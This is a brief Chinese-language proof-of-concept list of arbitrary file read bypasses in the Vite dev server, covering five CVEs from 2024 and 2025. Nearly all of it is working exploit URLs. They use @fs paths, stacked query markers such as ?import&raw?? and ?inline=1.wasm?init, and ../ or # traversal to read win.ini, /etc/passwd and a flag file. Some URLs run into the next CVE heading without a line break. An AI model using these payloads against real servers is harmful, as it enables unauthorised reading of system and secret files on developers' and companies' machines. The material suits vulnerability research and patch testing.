Vite任意文件读取的绕过
CVE-2024-45811
POC:
http://localhost:5174/iife/@fs/C:/windows/win.ini?import&rawCVE-2025-30208
针对该正则加一个?即可绕过,加2个的原因是代码中对url进行解码时会移除第一个?
POC:
http://localhost:5174/iife/@fs/C:/windows/win.ini?import&raw??CVE-2025-31125
非补丁绕过,找到了另一个文件读取的方法
POC:
http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?initCVE-2025-31486
找到31125另外一个分支
POC1:
http://localhost:5173/iife/C:/windows/win.ini?import&?.svg?.wasm?initPOC2:
http://localhost:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?rawCVE-2025-32395
POC:
http://localhost:5173/@fs/Projects/vite-project/#/../../../../../tmp/flag.txt
License:
杭州小单纯